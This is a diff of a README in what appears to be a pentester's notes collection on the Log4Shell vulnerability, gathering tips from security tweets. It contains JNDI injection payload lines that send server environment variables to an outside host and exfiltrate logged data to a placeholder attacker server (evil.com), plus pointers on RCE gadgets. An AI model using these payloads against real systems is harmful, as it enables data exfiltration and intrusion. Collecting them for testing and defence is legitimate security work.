pentesterland/Log4Shell/README.md

 - The Log4J formatting is nestable which means payloads like `${jndi:ldap://${env:user}.xyz.collab.com/a}` will leak server side env vars!
 [Source](https://twitter.com/_StaticFlow_/status/1469358229767475205)
 - [Tutorial on setting up RogueJDNI](https://twitter.com/ITSecurityguard/status/1469347404986077185)
 - [Class path is useful information to have to know what gadgets should be available or where you need to look for some to get rce.](https://twitter.com/jstnkndy/status/1469752457618202624)
+- Some events are only logged when an exception ocur, so specially long payloads with unexpected characters may help you trigger those exceptions.
+[Source](https://twitter.com/pwntester/status/1470435811812380675)
+- If you omit the closing brace `}` (so the payload would look like `${jndi:ldap://evil.com/`), you will potentially get a bunch of data exfiltrated to your server until the next `}` appears in that data.
+[Source](https://twitter.com/TomAnthonySEO/status/1470374984749133825)

 # WAF bypasses